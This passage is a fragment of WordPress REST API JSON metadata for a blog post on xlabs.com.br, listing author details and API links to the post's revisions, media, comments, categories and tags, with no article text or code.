Corr\u00eaa"},"url":"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/"}]}},"_links":{"self":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/386"}],"collection":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/comments?post=386"}],"version-history":[{"count":9,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/386\/revisions"}],"predecessor-version":[{"id":1626,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/386\/revisions\/1626"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media\/1624"}],"wp:attachment":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media?parent=386"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/categories?post=386"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/tags?post=386"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}